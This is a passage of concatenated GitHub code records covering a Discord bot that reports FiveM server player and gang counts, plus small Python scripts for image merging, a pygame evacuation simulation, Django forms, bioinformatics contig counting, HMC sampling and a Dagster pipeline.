open(f\"{os.path.realpath(os.path.dirname(__file__))}/config.json\") as file:\n config = json.load(file)\n\n\"\"\"\t\nSetup bot intents (events restrictions)\nFor more information about intents, please go to the following websites:\nhttps://discordpy.readthedocs.io/en/latest/intents.html\nhttps://discordpy.readthedocs.io/en/latest/intents.html#privileged-intents\n\n\nDefault Intents:\nintents.bans = True\nintents.dm_messages = True\nintents.dm_reactions = True\nintents.dm_typing = True\nintents.emojis = True\nintents.emojis_and_stickers = True\nintents.guild_messages = True\nintents.guild_reactions = True\nintents.guild_scheduled_events = True\nintents.guild_typing = True\nintents.guilds = True\nintents.integrations = True\nintents.invites = True\nintents.messages = True # `message_content` is required to get the content of the messages\nintents.reactions = True\nintents.typing = True\nintents.voice_states = True\nintents.webhooks = True\n\nPrivileged Intents (Needs to be enabled on developer portal of Discord), please use them only if you need them:\nintents.members = True\nintents.message_content = True\nintents.presences = True\n\"\"\"\n\nintents = discord.Intents.default()\n\n\"\"\"\nUncomment this if you want to use prefix (normal) commands.\nIt is recommended to use slash commands and therefore not use prefix commands.\n\nIf you want to use prefix commands, make sure to also enable the intent below in the Discord developer portal.\n\"\"\"\nintents.messages = True\n\nbot = Bot(command_prefix=commands.when_mentioned_or(\n config[\"prefix\"]), intents=intents, help_command=None)\n\n# Setup both of the loggers\nclass LoggingFormatter(logging.Formatter):\n # Colors\n black = \"\\x1b[30m\"\n red = \"\\x1b[31m\"\n green = \"\\x1b[32m\"\n yellow = \"\\x1b[33m\"\n blue = \"\\x1b[34m\"\n gray = \"\\x1b[38m\"\n # Styles\n reset = \"\\x1b[0m\"\n bold = \"\\x1b[1m\"\n\n COLORS = {\n logging.DEBUG: gray + bold,\n logging.INFO: blue + bold,\n logging.WARNING: yellow + bold,\n logging.ERROR: red,\n logging.CRITICAL: red + bold\n }\n\n def format(self, record):\n log_color = self.COLORS[record.levelno]\n format = \"(black){asctime}(reset) (levelcolor){levelname:<8}(reset) (green){name}(reset) {message}\"\n format = format.replace(\"(black)\", self.black + self.bold)\n format = format.replace(\"(reset)\", self.reset)\n format = format.replace(\"(levelcolor)\", log_color)\n format = format.replace(\"(green)\", self.green + self.bold)\n formatter = logging.Formatter(format, \"%Y-%m-%d %H:%M:%S\", style=\"{\")\n return formatter.format(record)\n\n\nlogger = logging.getLogger(\"discord_bot\")\nlogger.setLevel(logging.INFO)\n\n# Console handler\nconsole_handler = logging.StreamHandler()\nconsole_handler.setFormatter(LoggingFormatter())\n# File handler\nfile_handler = logging.FileHandler(\n filename=\"discord.log\", encoding=\"utf-8\", mode=\"w\")\nfile_handler_formatter = logging.Formatter(\n \"[{asctime}] [{levelname:<8}] {name}: {message}\", \"%Y-%m-%d %H:%M:%S\", style=\"{\")\nfile_handler.setFormatter(file_handler_formatter)\n\n# Add the handlers\nlogger.addHandler(console_handler)\nlogger.addHandler(file_handler)\nbot.logger = logger\n\n\nasync def init_db():\n async with aiosqlite.connect(f\"{os.path.realpath(os.path.dirname(__file__))}/database/database.db\") as db:\n with open(f\"{os.path.realpath(os.path.dirname(__file__))}/database/schema.sql\") as file:\n await db.executescript(file.read())\n await db.commit()\n\n\n\"\"\"\nCreate a bot variable to access the config file in cogs so that you don't need to import it every time.\n\nThe config is available using the following code:\n- bot.config # In this file\n- self.bot.config # In cogs\n\"\"\"\nbot.config = config\nguild_id = 0\n\n@bot.event\nasync def on_ready() -> None:\n \"\"\"\n The code in this event is executed when the bot is ready.\n \"\"\"\n bot.logger.info(f\"Logged in as {bot.user.name}\")\n bot.logger.info(f\"discord.py API version: {discord.__version__}\")\n bot.logger.info(f\"Python version: {platform.python_version()}\")\n bot.logger.info(\n f\"Running on: {platform.system()} {platform.release()} ({os.name})\")\n bot.logger.info(\"-------------------\")\n if config[\"sync_commands_globally\"]:\n bot.logger.info(\"Syncing commands globally...\")\n await bot.tree.sync()\n\n@bot.event\nasync def on_guild_join(guild):\n path = \"serverSetting/\" + str(guild.id)\n try:\n global guild_id\n guild_id = guild.id\n os.makedirs(path)\n print(\"Making dir:\" + path)\n json_dict = {\n \"guild_id\": guild.id,\n \"guild_data\": {\n \"normal_data\": {\n \"message_id\": 0,\n \"old_message_id\": 0,\n \"serverInviteId\": \"\",\n \"channelId\": 0\n },\n \"embed_data\": {\n \"embedTitle\": \":pencil: Server Statistics\",\n \"embedServerName\": \"\",\n \"embedGangName\": \"\" \n }\n }\n }\n json_object = json.dumps(json_dict, indent=4)\n with open(f\"./serverSetting/{str(guild.id)}/settings.json\", \"w\") as f:\n f.write(json_object)\n # if the dir exist\n except FileExistsError:\n print(\"Dir exist \" + path)\n\n# @tasks.loop(minutes=1.0)\n# async def status_task() -> None:\n# \"\"\"\n# Setup the game status task of the bot.\n# \"\"\"\n# statuses = [\"\", \"with Krypton!\", \"with humans!\"]\n# await bot.change_presence(activity=discord.Game(random.choice(statuses)))\n\n\n@bot.event\nasync def on_message(message: discord.Message) -> None:\n \"\"\"\n The code in this event is executed every time someone sends a message, with or without the prefix\n\n :param message: The message that was sent.\n \"\"\"\n if message.author == bot.user or message.author.bot:\n return\n await bot.process_commands(message)\n\n\n@bot.event\nasync def on_command_completion(context: Context) -> None:\n \"\"\"\n The code in this event is executed every time a normal command has been *successfully* executed.\n\n :param context: The context of the command that has been executed.\n \"\"\"\n full_command_name = context.command.qualified_name\n split = full_command_name.split(\" \")\n executed_command = str(split[0])\n if context.guild is not None:\n bot.logger.info(\n f\"Executed {executed_command} command in {context.guild.name} (ID: {context.guild.id}) by {context.author} (ID: {context.author.id})\")\n else:\n bot.logger.info(\n f\"Executed {executed_command} command by {context.author} (ID: {context.author.id}) in DMs\")\n\n\n@bot.event\nasync def on_command_error(context: Context, error) -> None:\n \"\"\"\n The code in this event is executed every time a normal valid command catches an error.\n\n :param context: The context of the normal command that failed executing.\n :param error: The error that has been faced.\n \"\"\"\n if isinstance(error, commands.CommandOnCooldown):\n minutes, seconds = divmod(error.retry_after, 60)\n hours, minutes = divmod(minutes, 60)\n hours = hours % 24\n embed = discord.Embed(\n description=f\"**Please slow down** - You can use this command again in {f'{round(hours)} hours' if round(hours) > 0 else ''} {f'{round(minutes)} minutes' if round(minutes) > 0 else ''} {f'{round(seconds)} seconds' if round(seconds) > 0 else ''}.\",\n color=0xE02B2B\n )\n await context.send(embed=embed)\n elif isinstance(error, exceptions.UserBlacklisted):\n \"\"\"\n The code here will only execute if the error is an instance of 'UserBlacklisted', which can occur when using\n the @checks.not_blacklisted() check in your command, or you can raise the error by yourself.\n \"\"\"\n embed = discord.Embed(\n description=\"You are blacklisted from using the bot!\",\n color=0xE02B2B\n )\n await context.send(embed=embed)\n bot.logger.warning(\n f\"{context.author} (ID: {context.author.id}) tried to execute a command in the guild {context.guild.name} (ID: {context.guild.id}), but the user is blacklisted from using the bot.\")\n elif isinstance(error, exceptions.UserNotOwner):\n \"\"\"\n Same as above, just for the @checks.is_owner() check.\n \"\"\"\n embed = discord.Embed(\n description=\"You are not the owner of the bot!\",\n color=0xE02B2B\n )\n await context.send(embed=embed)\n bot.logger.warning(\n f\"{context.author} (ID: {context.author.id}) tried to execute an owner only command in the guild {context.guild.name} (ID: {context.guild.id}), but the user is not an owner of the bot.\")\n elif isinstance(error, commands.MissingPermissions):\n embed = discord.Embed(\n description=\"You are missing the permission(s) `\" + \", \".join(\n error.missing_permissions) + \"` to execute this command!\",\n color=0xE02B2B\n )\n await context.send(embed=embed)\n elif isinstance(error, commands.BotMissingPermissions):\n embed = discord.Embed(\n description=\"I am missing the permission(s) `\" + \", \".join(\n error.missing_permissions) + \"` to fully perform this command!\",\n color=0xE02B2B\n )\n await context.send(embed=embed)\n elif isinstance(error, commands.MissingRequiredArgument):\n embed = discord.Embed(\n title=\"Error!\",\n # We need to capitalize because the command arguments have no capital letter in the code.\n description=str(error).capitalize(),\n color=0xE02B2B\n )\n await context.send(embed=embed)\n else:\n raise error\n\n\nasync def load_cogs() -> None:\n \"\"\"\n The code in this function is executed whenever the bot will start.\n \"\"\"\n for file in os.listdir(f\"{os.path.realpath(os.path.dirname(__file__))}/cogs\"):\n if file.endswith(\".py\"):\n extension = file[:-3]\n try:\n await bot.load_extension(f\"cogs.{extension}\")\n bot.logger.info(f\"Loaded extension '{extension}'\")\n except Exception as e:\n exception = f\"{type(e).__name__}: {e}\"\n bot.logger.error(\n f\"Failed to load extension {extension}\\n{exception}\") \n\n# embedTitle = \":pencil: Server Statistics\"\n# embedServerName = \"\"\n# embedGangName = \"\"\n# embedServerCount = \"\"\nembedGangCount = []\ngangDiscordId = []\nserverDiscordId = []\n# message_id = 0\n# old_message_id = 0\n# serverIviteId = \"\"\n# channelId = 0\n\n\ndef getJsonData():\n with open(f\"./serverSetting/{str(guild_id)}/settings.json\", \"r\") as f:\n return json.loads(f.read()) \n\ndef getData():\n def get_page_content(url, head):\n \"\"\"\n Function to get the page content\n \"\"\"\n req = Request(url, headers=head)\n return urlopen(req)\n \n url = 'https://servers-frontend.fivem.net/api/servers/single/'+getJsonData()['guild_data']['normal_data']['serverInviteId']\n head = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive',\n }\n\n data = get_page_content(url, head).read()\n newData = data.decode(\"utf-8\").replace(\"'\", '\"')\n jsonData = json.loads(newData)\n realData = json.loads(json.dumps(jsonData))\n\n return realData\n\ndef getPlayerCount():\n data_json = getData()['Data']\n return f\"{data_json['clients']}/{data_json['sv_maxclients']}\"\n\ndef getGangCount():\n global serverDiscordId\n global embedGangCount\n\n data_json = getData()['Data']['players']\n \n for i in range(len(data_json)):\n for j in range(len(data_json[i]['identifiers'])):\n if 'discord' in (data_json[i]['identifiers'][j]):\n serverDiscordId.append(int(data_json[i]['identifiers'][j].split(':')[1]))\n\n for i in range(len(gangDiscordId)):\n if gangDiscordId[i] in serverDiscordId and gangDiscordId[i] not in embedGangCount:\n embedGangCount.append(gangDiscordId[i])\n\n return embedGangCount\n\n@bot.command()\nasync def help(ctx):\n global guild_id\n guild_id = ctx.guild.id\n embed=discord.Embed(title=\":book: Help Documentation\", description=\"Execute the following commands in order to set up the bot!\",color=0xffffff)\n\n embed.add_field(name=\"!setinvite [server invite code] e.g. zb8lmd\", value=\"\", inline=False)\n embed.add_field(name=\"!setchannel [tag channel] e.g. #general\", value=\"\", inline=False)\n embed.add_field(name=\"!setup [server name] [gang name]\", value=\"\", inline=False)\n embed.add_field(name=\"!role [tag universal role of members] e.g. @role\", value=\"\", inline=False)\n embed.add_field(name=\"!run\", value=\"\", inline=False)\n embed.add_field(name=\"\", value=\"server & gang name and role must be set up to execute run\", inline=False)\n embed.add_field(name=\"\", value=\"dont include square brackets in the setup and role\", inline=False)\n\n embed.set_footer(text=f\"Created by yne#2654.\")\n\n await ctx.send(embed=embed)\n\n@bot.command()\nasync def reset(ctx):\n json_dict = {\n \"guild_id\": ctx.guild.id,\n \"guild_data\": {\n \"normal_data\": {\n \"message_id\": 0,\n \"old_message_id\": 0,\n \"serverInviteId\": \"\",\n \"channelId\": 0\n },\n \"embed_data\": {\n \"embedTitle\": \":pencil: Server Statistics\",\n \"embedServerName\": \"\",\n \"embedGangName\": \"\" \n }\n }\n }\n json_object = json.dumps(json_dict, indent=4)\n with open(f\"./serverSetting/{str(ctx.guild.id)}/settings.json\", \"r+\") as f:\n f.truncate()\n f.write(json_object)\n\n@bot.command()\nasync def setinvite(ctx, serverId):\n global guild_id\n guild_id = ctx.guild.id\n with open(f\"./serverSetting/{str(ctx.guild.id)}/settings.json\", \"r+\") as jsonFile:\n data = json.load(jsonFile)\n\n data['guild_data']['normal_data']['serverInviteId'] = serverId\n\n jsonFile.seek(0) # rewind\n json.dump(data, jsonFile, indent=4)\n jsonFile.truncate()\n\n@bot.command()\nasync def setchannel(ctx, channel: discord.TextChannel):\n global guild_id\n guild_id = ctx.guild.id\n with open(f\"./serverSetting/{str(ctx.guild.id)}/settings.json\", \"r+\") as jsonFile:\n data = json.load(jsonFile)\n\n data['guild_data']['normal_data']['channelId'] = channel.id\n\n jsonFile.seek(0) # rewind\n json.dump(data, jsonFile, indent=4)\n jsonFile.truncate()\n\n@bot.command()\nasync def setup(ctx, *args):\n global guild_id\n guild_id = ctx.guild.id\n embedServerName = (args[0])\n embedGangName = (args[1])\n with open(f\"./serverSetting/{str(ctx.guild.id)}/settings.json\", \"r+\") as jsonFile:\n data = json.load(jsonFile)\n\n data['guild_data']['embed_data']['embedServerName'] = embedServerName\n data['guild_data']['embed_data']['embedGangName'] = embedGangName\n\n jsonFile.seek(0) # rewind\n json.dump(data, jsonFile, indent=4)\n jsonFile.truncate()\n\n #await ctx.send(ctx.message.guild.name)\n\n@bot.command()\nasync def role(ctx, role: discord.Role):\n global guild_id\n guild_id = ctx.guild.id\n global gangDiscordId\n if role in ctx.message.author.roles:\n gangDiscordId.append(ctx.message.id)\n for user in ctx.guild.members:\n if role in user.roles:\n gangDiscordId.append(user.id)\n\n@bot.command()\nasync def run(ctx):\n global guild_id\n guild_id = ctx.guild.id\n getJsonDataArr = getJsonData()\n if getJsonDataArr['guild_data']['embed_data']['embedServerName'] == \"\" or getJsonDataArr['guild_data']['embed_data']['embedGangName'] == \"\" or getJsonDataArr['guild_data']['normal_data']['channelId'] == 0 or getJsonDataArr['guild_data']['normal_data']['serverInviteId'] == 0: await ctx.send('Please setup the required details!')\n else:\n embedServerCount = getPlayerCount()\n embedGangCount = getGangCount()\n now = datetime.now()\n embed=discord.Embed(title=f\"{getJsonDataArr['guild_data']['embed_data']['embedTitle']}\", color=0xffffff)\n\n embed.add_field(name=f\"{getJsonDataArr['guild_data']['embed_data']['embedServerName']} Player Count: {embedServerCount}\", value=\"\", inline=False)\n embed.add_field(name=f\"In City {getJsonDataArr['guild_data']['embed_data']['embedGangName']} Count: {len(embedGangCount)}\", value=\"\", inline=False)\n\n embed.set_footer(text=f\"Created by yne#2654. Last refresh at {now}\")\n\n if (getJsonDataArr['guild_data']['normal_data']['old_message_id'] != 0 and ctx.channel.id == getJsonDataArr['guild_data']['normal_data']['channelId']) :\n run_count_background.stop()\n msg = await ctx.fetch_message(getJsonDataArr['guild_data']['normal_data']['old_message_id'])\n await msg.delete() \n\n message = await ctx.send(embed=embed)\n with open(f\"./serverSetting/{str(ctx.guild.id)}/settings.json\", \"r+\") as jsonFile:\n data = json.load(jsonFile)\n\n data['guild_data']['normal_data']['message_id'] = message.id\n data['guild_data']['normal_data']['old_message_id'] = message.id\n\n jsonFile.seek(0) # rewind\n json.dump(data, jsonFile, indent=4)\n jsonFile.truncate()\n\n if not run_count_background.is_running():\n run_count_background.start()\n\n@tasks.loop(seconds=60.0)\nasync def run_count_background():\n getJsonDataArr = getJsonData()\n embedServerCount = getPlayerCount()\n embedGangCount = getGangCount()\n now = datetime.now()\n newEmbed=discord.Embed(title=f\"{getJsonDataArr['guild_data']['embed_data']['embedTitle']}\", color=0xffffff)\n\n newEmbed.add_field(name=f\"{getJsonDataArr['guild_data']['embed_data']['embedServerName']} Player Count: {embedServerCount}\", value=\"\", inline=False)\n newEmbed.add_field(name=f\"In City {getJsonDataArr['guild_data']['embed_data']['embedGangName']} Count: {len(embedGangCount)}\", value=\"\", inline=False)\n # for i in range(len(embedGangCount)):\n # newEmbed.add_field(name=\"\", value=f\"@{await bot.fetch_user(embedGangCount[i])}\", inline=False)\n\n newEmbed.set_footer(text=f\"Created by yne#2654. Last refresh at {now}\")\n \n message = await bot.get_channel(getJsonDataArr['guild_data']['normal_data']['channelId']).fetch_message(getJsonDataArr['guild_data']['normal_data']['message_id'])\n await message.edit(embed = newEmbed)\n\nasyncio.run(init_db())\n#asyncio.run(load_cogs())\n#asyncio.run(init_json())\nbot.run(config[\"token\"])\n","repo_name":"Yahye-Abdulle/5M-Player-Tracker","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":19542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27514876349","text":"import pathlib\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport os\n\nimport PIL\nfrom PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\n\nfile_dir = os.getcwd()\nmaster_dir = file_dir + '/../../' # gets master directory\nimg_dir = master_dir + 'Results/Ethane_Propane_Isotherms/'\nlist_im = [img_dir + 'Ethane_isotherm.png',\n img_dir + 'Propane_isotherm.png']\n\nimgs = [ PIL.Image.open(i).convert(\"RGBA\") for i in list_im ]\n\ndef get_concat_h(im1, im2):\n dst = Image.new('RGB', (im1.width + im2.width, im1.height))\n dst.paste(im1, (0, 0))\n dst.paste(im2, (im1.width, 0))\n return dst\n\ndef get_concat_v(im1, im2):\n dst = Image.new('RGB', (im1.width, im1.height + im2.height))\n dst.paste(im1, (0, 0))\n dst.paste(im2, (0, im1.height))\n return dst\n\ndef get_concat_h_cut(im1, im2):\n dst = Image.new('RGB', (im1.width + im2.width, min(im1.height, im2.height)))\n dst.paste(im1, (0, 0))\n dst.paste(im2, (im1.width, 0))\n return dst\n\ndef get_concat_v_cut(im1, im2):\n dst = Image.new('RGB', (min(im1.width, im2.width), im1.height + im2.height))\n dst.paste(im1, (0, 0))\n dst.paste(im2, (0, im1.height))\n return dst\nget_concat_h_cut(imgs[0], imgs[1]).save('Figure_1.png')\n#get_concat_h_cut(imgs[0], imgs[1]).save('Figure_1.ps')","repo_name":"snurr-group/energygrid","sub_path":"Manuscript-Figures/Figure 1/mergefigure.py","file_name":"mergefigure.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38438471511","text":"\nfrom logic import (\n GRID_FREE, is_grid_block_free, block_size_coefficient, window_height, window_width, rows, cols,\n Mid, Child, Senior, Obstacle, ExitCell, ShapeEllipse,\n human_is_at_the_exit_cell, get_children_count, get_mids_count, get_senior_count\n)\nfrom maps import CLASS_214_MAP\nimport numpy as np\nimport pygame\nfrom pygame.locals import (\n K_RIGHT,\n KEYDOWN,\n QUIT,\n)\n\n\n# Configuration -> select map\nMAP = CLASS_214_MAP\n\n# Stats for grid\nTIME_TO_LEAVE_ALL_HUMANS = 0\n\n\nclass GridBlockTakenException(Exception):\n pass\n\n\ndef init_grid(rows, cols, humans, obstacles, exit_cell):\n grid = np.zeros(shape=(rows, cols), dtype=[('x', 'int'), ('y', 'int'), ('z', 'int')])\n grid.fill(GRID_FREE)\n\n # add obstacles to grid, no collisions here\n for ob in obstacles:\n ob.calculate_cells()\n for c in ob.get_cells():\n grid[c[0], c[1]] = ob.get_color()\n\n # add exit cell to grid\n if not is_grid_block_free(grid, exit_cell.pos_x, exit_cell.pos_y):\n raise GridBlockTakenException(\"Exit Cell could no be initialized at pos_x {} pos_y {} are already taken!\".format(\n exit_cell.pos_x, exit_cell.pos_y\n ))\n\n grid[exit_cell.pos_x, exit_cell.pos_y] = exit_cell.color\n\n # when human is close to exit cell we want to remove it from scene\n index_to_remove_human = [] \n\n # add humans to grid\n for i in range(len(humans)):\n humans[i].calculate_body_cells(grid, exit_cell)\n\n # check if any grid is so close to exit cell\n if human_is_at_the_exit_cell(humans[i], exit_cell):\n index_to_remove_human.append(i)\n\n # write color of the human to the grid\n for body_cell_pos in humans[i].get_body_cells():\n grid[body_cell_pos[0], body_cell_pos[1]] = humans[i].get_color()\n\n for i in index_to_remove_human:\n humans.pop(i)\n\n global TIME_TO_LEAVE_ALL_HUMANS\n if not humans:\n print(\"All humans has leaved the room in {} time_to_leave\".format(TIME_TO_LEAVE_ALL_HUMANS))\n else:\n TIME_TO_LEAVE_ALL_HUMANS += 1\n\n return grid\n\n\ndef update_grid(grid, humans, obstacles, exit_cell):\n for human in humans:\n human.move()\n\n rows, cols = grid.shape\n new_grid = init_grid(rows, cols, humans, obstacles, exit_cell)\n return new_grid\n\n\ndef draw_grid(screen, grid, w_width, w_height):\n rows, cols = grid.shape\n blockSize = ((min(w_width, w_height) - max(rows, cols)) / max(rows, cols)) * block_size_coefficient\n\n for x in range(1, rows - 1):\n for y in range(1, cols - 1):\n pos_x = (blockSize + 1) * x\n pos_y = (blockSize + 1) * y\n rect = pygame.Rect(pos_x, pos_y, blockSize, blockSize)\n pygame.draw.rect(screen, grid[x, y], rect, 0)\n\n pygame.display.flip()\n\n\nif __name__ == \"__main__\":\n print(\"Window Size: {} x {}\".format(window_width, window_height))\n print(\"Cells: {} x {}\".format(rows, cols))\n pygame.init()\n screen = pygame.display.set_mode([window_width, window_height])\n screen.fill((128, 128, 128))\n clock = pygame.time.Clock()\n\n humans = MAP['humans']\n obstacles = MAP['obstacles']\n exit_cell = MAP['exit_cell']\n\n print(\"Map consists of {} obstacles, {} humans, where there are {} children, {} mids and {} seniors\".format(\n len(obstacles), len(humans), get_children_count(humans), get_mids_count(humans), get_senior_count(humans)\n ))\n\n grid = init_grid(rows, cols, humans, obstacles, exit_cell)\n\n draw_grid(screen, grid, window_width, window_height)\n\n running = True\n\n while running:\n for event in pygame.event.get(): \n if event.type == QUIT:\n running = False\n \n if event.type == KEYDOWN:\n if event.key == K_RIGHT:\n grid = update_grid(grid, humans, obstacles, exit_cell)\n draw_grid(screen, grid, window_width, window_height)\n\n pygame.quit()\n","repo_name":"navuyi/agent-systems-project","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37867747539","text":"def get_feat_d_from_ID(feat_ID, mut_row):\n feat_d = dict()\n for d in mut_row[\"genomic features\"]:\n if d[\"RegulonDB ID\"] == feat_ID:\n feat_d = d\n break\n return feat_d\n\n\ndef get_feat_d(json, RegulonDB_ID=None, name=None):\n feat_d = dict()\n for d in json:\n if (RegulonDB_ID and d[\"RegulonDB ID\"] == RegulonDB_ID) or (name and d[\"name\"] == name):\n feat_d = d\n break\n return feat_d\n\n\n\n# The below is currently only appropriate for genomic and genetic features \n# since it's not accounting for annotation types that don't have any entries\n# for mutations.\nimport pandas as pd\n\ndef get_feat_mut_cnt_df_from_links(mut_df, feat_col_name, link_col_name):\n f_cnt_df = pd.DataFrame(columns=[\"length\", \"observed mutation count\", \"name\"])\n for i, r in mut_df.iterrows():\n for f, links in r[link_col_name].items():\n f_d = get_feat_d(RegulonDB_ID=f, json=r[feat_col_name])\n if f_d[\"RegulonDB ID\"] in f_cnt_df.index:\n f_cnt_df.loc[f_d[\"RegulonDB ID\"], \"observed mutation count\"] += len(links)\n else:\n f_len = f_d[\"range\"][1] - f_d[\"range\"][0] + 1 \n df = pd.DataFrame({\"name\": f_d[\"name\"], \"length\": f_len, \"observed mutation count\": len(links)},\n index=[f_d[\"RegulonDB ID\"]]) # \"name\" column just for visual inspection\n f_cnt_df = f_cnt_df.append(df, sort=False)\n\n return f_cnt_df\n","repo_name":"Aletechdev/aledbmutil","sub_path":"feature.py","file_name":"feature.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18665728738","text":"from django import forms\n\nclass ModelNameForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = ModelName\n\t\tfields = '__all__'\n\t\texclude = ['slug', 'created', 'modified']\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(ModelNameForm, self).__init__(*args, **kwargs)\n\t\tfor fieldname, field in self.fields.items():\n\t\t\tfield.widget.attrs.update({\n\t\t\t\t'class': 'form-control',\n\t\t\t\t'placeholder': '',\n\t\t\t})\n\n\tdef save(self, *args, **kwargs):\n\t\tsuper().save(*args, **kwargs)","repo_name":"itsDuncan/snippets","sub_path":"form-customization/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73453417475","text":"\"\"\"22. Verificar si un texto que termina en punto es un palíndromo (capicúa). Un texto es\npalíndromo si se lee lo mismo de izquierda a derecha o de derecha a izquierda. Ej: “Amor\na roma”\n\"\"\"\n\ndef main():\n palindrome()\n\n\ndef palindrome():\n texto = input(\"Ingrese una frase terminada en punto, para verificar si es palíndrome: \")\n texto_limpio = texto.replace(\" \", \"\")\n palabra_lista = texto_limpio.replace(\".\", \"\")\n palabra = palabra_lista.lower()\n palabra_invertida = palabra[::-1]\n \n if palabra == palabra_invertida:\n print(\"Es palíndrome\")\n else:\n print(\"No es palíndrome\")\n \n\nif __name__ == '__main__':\n main()","repo_name":"isabelyb/Python_MinTIC_2021","sub_path":"week_2/ejercicios7_22palindrome.py","file_name":"ejercicios7_22palindrome.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3687563947","text":"import os\r\nfrom Bio import SeqIO\r\n\r\nlog = open('miniproject.log' , 'a')\r\ndef numLargeContigs():\r\n\r\n #we will be counting contings that are larger than 1000 base pairs\r\n\r\n\r\n contigFile = open('LargeContigs.txt','w')\r\n count = 0\r\n\r\n #initializing count and updating as each large contig is found\r\n #must supply this path because Spades stores the contigs in a subfolder\r\n data = SeqIO.parse('./SpadesAssembly/contigs.fasta','fasta')\r\n\r\n for record in data:\r\n x = len(record.seq)\r\n\r\n if x > 1000:\r\n count = count+1\r\n\r\n contigFile.write('> '+str(record.id) +'\\n' +str(record.seq) + '\\n')\r\n\r\n contigFile.close()\r\n log.write('There are '+str(count)+' contigs > 1000 bp in the assembly.')\r\n\r\nnumLargeContigs()\r\n\r\n \r\n","repo_name":"THEHANWOLF13/myrepo_mini_project","sub_path":"numLargeContigs.py","file_name":"numLargeContigs.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37984361725","text":"# Langevin or Hamiltonian MCMC version: overrides primitive proposal\n# Requires pytorch\n\nimport torch\n\nfrom HINTS import *\n\n\nclass HINTS_HMC(HINTS):\n def __init__(self, args, fn, noise_sd = 0.01):\n super().__init__(args, fn)\n self.epsilon = args.epsilon\n self.noise_sd = noise_sd\n #\n # HMC version ... correction depends on knowing gradient at proposed state\n def primitive_move(self, model, index = 0, always_accept = False):\n scenarios = self.scenarios(0, index)\n #print(\"primitive\", index, len(scenarios))\n v = self.fn(model, scenarios, True) # puts a gradient into state as a side effect for HMC\n current = self.fn.sample_initial_state() # empty model\n # do this with no grad...\n correction = 0.0\n for f, f_prime in zip(model.parameters(), current.parameters()):\n # f.grad.data is the right shape to store momentum temporarily\n ###TO DO how big is f.grad.data compared with proposal noise\n f.grad.data = self.noise_sd * torch.randn(f.shape).to(f.device) + self.epsilon * 0.5 * f.grad.data # TO DO check gradient convention\n f_prime.data = f.data + 0.5 * self.epsilon * f.grad.data # add momentum\n correction -= 0.5 * (f.grad.data * f.grad.data).sum() # Kinetic energy term of -H\n # compute the value of the new state and its gradient\n v_prime = self.fn(current, scenarios, True) # need gdt again\n # store the new momentum in the grad entries of the candidate model\n for f, f_prime in zip(model.parameters(), current.parameters()):\n p_prime = f.grad.data + self.epsilon * 0.5 * f_prime.grad.data # TO DO check gradient convention\n correction += 0.5 * (p_prime * p_prime).sum() # kinetic energy term of H_new\n f.grad = None # must not reuse (unless we do more leapfrog steps)\n f_prime.grad = None\n \n # standard MHR / HINTS acceptance\n vdiff = (v_prime - v)/self.Ts[0] # PE change ... these are cached evaluations, no side effects\n #correction = 0 # TEMPOARY OVERRDE - SGD\n accept = True if always_accept else self.metropolis_accept(vdiff - correction)\n (self.acceptances if accept else self.rejections)[0] += 1\n return((current, vdiff) if accept else (model, 0.0))","repo_name":"mjstrens/HINTS","sub_path":"HINTS_torch.py","file_name":"HINTS_torch.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"24177194351","text":"import pandas as pd\nimport numpy as np\nfrom dagster import pipeline, solid, execute_pipeline\nfrom forecasting_framework.utils.pre_processing import pre_process\n\n\n@solid\ndef read_commodity_data_raw():\n df_commodity = pd.read_excel(\"forecasting_framework/data/Rawdata.xls\")\n return df_commodity\n\n\n@solid\ndef read_rainfall_data_raw():\n df_rainfall = pd.read_csv(\"forecasting_framework/data/Rainfall_2020.csv\")\n return df_rainfall\n\n\n@solid\ndef process_data(df, rainfall_df):\n final_df = pre_process(df, rainfall_df)\n final_df.to_excel('forecasting_framework/data/processed_data.xlsx', index=False)\n return final_df\n\n\n@solid\ndef data_check(context, processed_df):\n mean_rainfall = processed_df['Rainfall'].mean()\n total_commodities = processed_df['COMM_NAME'].value_counts()\n total_category = processed_df['COMM_CATEGORY'].value_counts()\n context.log.info(f\"mean_rainfall: {mean_rainfall}\")\n context.log.info(f\"total_commodities: {total_commodities}\")\n context.log.info(f\"total_category: {total_category}\")\n\n\n@solid\ndef test_cases(processed_df):\n isinstance(processed_df['Date'], pd.datetime)\n isinstance(processed_df['COMM_NAME'], object)\n isinstance(processed_df['COMM_CODE'], int)\n isinstance(processed_df['COMM_CATEGORY'], object)\n isinstance(processed_df['COMM_WT'], float)\n isinstance(processed_df['Monthly Price'], float)\n isinstance(processed_df['Rainfall'], 